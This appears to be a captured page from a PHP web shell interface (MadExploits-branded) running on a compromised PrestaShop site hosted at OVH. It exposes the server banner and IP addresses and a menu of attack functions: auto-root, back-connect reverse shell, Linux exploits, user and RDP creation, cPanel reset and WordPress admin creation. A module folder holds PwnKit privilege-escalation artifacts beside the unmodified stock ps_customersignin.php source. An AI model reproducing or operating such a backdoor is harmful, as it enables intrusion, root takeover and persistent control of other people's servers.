Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.83
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
newmed /
modules /
ps_customersignin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwx---r-x
translations
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
composer.lock
53.02
KB
-rw----r--
config.xml
446
B
-rw----r--
config_fr.xml
508
B
-rw----r--
index.php
1.35
KB
-rw----r--
logo.png
6.87
KB
-rw----r--
ps_customersignin.php
3.64
KB
-rw----r--
ps_customersignin.tpl
1.64
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ps_customersignin.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License 3.0 (AFL-3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/AFL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/AFL-3.0 Academic Free License 3.0 (AFL-3.0) */ use PrestaShop\PrestaShop\Core\Module\WidgetInterface; if (!defined('_PS_VERSION_')) { exit; } class Ps_CustomerSignIn extends Module implements WidgetInterface { /** * @var string Name of the module running on PS 1.6.x. Used for data migration. */ const PS_16_EQUIVALENT_MODULE = 'blockuserinfo'; private $templateFile; public function __construct() { $this->name = 'ps_customersignin'; $this->author = 'PrestaShop'; $this->version = '2.0.4'; $this->need_instance = 0; parent::__construct(); $this->displayName = $this->getTranslator()->trans('Customer "Sign in" link', [], 'Modules.Customersignin.Admin'); $this->description = $this->getTranslator()->trans('Make your customers feel at home on your store, invite them to sign in!', [], 'Modules.Customersignin.Admin'); $this->ps_versions_compliancy = ['min' => '1.7.1.0', 'max' => _PS_VERSION_]; $this->templateFile = 'module:ps_customersignin/ps_customersignin.tpl'; } public function install() { // Migrate data from 1.6 equivalent module (if applicable), then uninstall if (Module::isInstalled(self::PS_16_EQUIVALENT_MODULE)) { $oldModule = Module::getInstanceByName(self::PS_16_EQUIVALENT_MODULE); if ($oldModule) { $oldModule->uninstall(); } } return parent::install(); } public function getWidgetVariables($hookName, array $configuration) { $logged = $this->context->customer->isLogged(); if ($logged) { $customerName = $this->getTranslator()->trans( '%firstname% %lastname%', [ '%firstname%' => $this->context->customer->firstname, '%lastname%' => $this->context->customer->lastname, ], 'Modules.Customersignin.Admin' ); } else { $customerName = ''; } $link = $this->context->link; return [ 'logged' => $logged, 'customerName' => $customerName, /* * @deprecated */ 'logout_url' => $link->getPageLink('index', true, null, 'mylogout'), /* * @deprecated */ 'my_account_url' => $link->getPageLink('my-account', true), ]; } public function renderWidget($hookName, array $configuration) { $this->smarty->assign($this->getWidgetVariables($hookName, $configuration)); return $this->fetch($this->templateFile); } }
Close